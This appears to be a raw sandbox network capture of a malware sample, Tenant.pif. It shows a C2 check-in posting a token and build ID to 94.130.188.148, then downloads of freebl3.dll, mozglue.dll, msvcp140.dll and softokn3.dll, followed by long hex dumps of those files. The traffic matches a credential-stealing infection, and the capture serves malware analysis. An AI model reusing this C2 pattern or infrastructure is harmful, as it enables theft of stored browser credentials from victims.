Timestamp: 2024-08-29 18:49:36 UTC | Bytes transferred: 437 | Direction: OUT | Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------IDBGHDGHCGHCAAKFIIECCont
Timestamp: 2024-08-29 18:49:37 UTC | Bytes transferred: 158 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Timestamp: 2024-08-29 18:49:37 UTC | Bytes transferred: 12 | Direction: IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 59948 | Destination IP: 94.130.188.148 | Destination Port: 443 | PID: 2260 | Process: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp: 2024-08-29 18:49:37 UTC | Bytes transferred: 225 | Direction: OUT | Data:
GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-08-29 18:49:38 UTC | Bytes transferred: 262 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:38 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Thursday, 29-Aug-2024 18:49:38 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 59949 | Destination IP: 94.130.188.148 | Destination Port: 443 | PID: 2260 | Process: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
Timestamp: 2024-08-29 18:49:39 UTC | Bytes transferred: 225 | Direction: OUT | Data:
GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Host: 94.130.188.148
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-08-29 18:49:40 UTC | Bytes transferred: 262 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 18:49:40 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 29-Aug-2024 18:49:40 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                      Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                      Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b
                                                                                      Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                      2024-08-29 18:49:40 UTC16384INData Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48
                                                                                      Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      13 | 192.168.2.5 | 59950 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-08-29 18:49:42 UTC | 226 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:42 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:42 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 450024
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:42 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:42 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d
                                                                                      Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                      Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                      Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                      Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                      Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                      Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                      Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                      Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                      2024-08-29 18:49:42 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                      Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      14 | 192.168.2.5 | 59951 | 94.130.188.148 | 443 | 2260 | C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-08-29 18:49:43 UTC | 226 | OUT | GET /softokn3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:44 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:44 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 257872
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:44 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:44 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                      Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                      2024-08-29 18:49:44 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
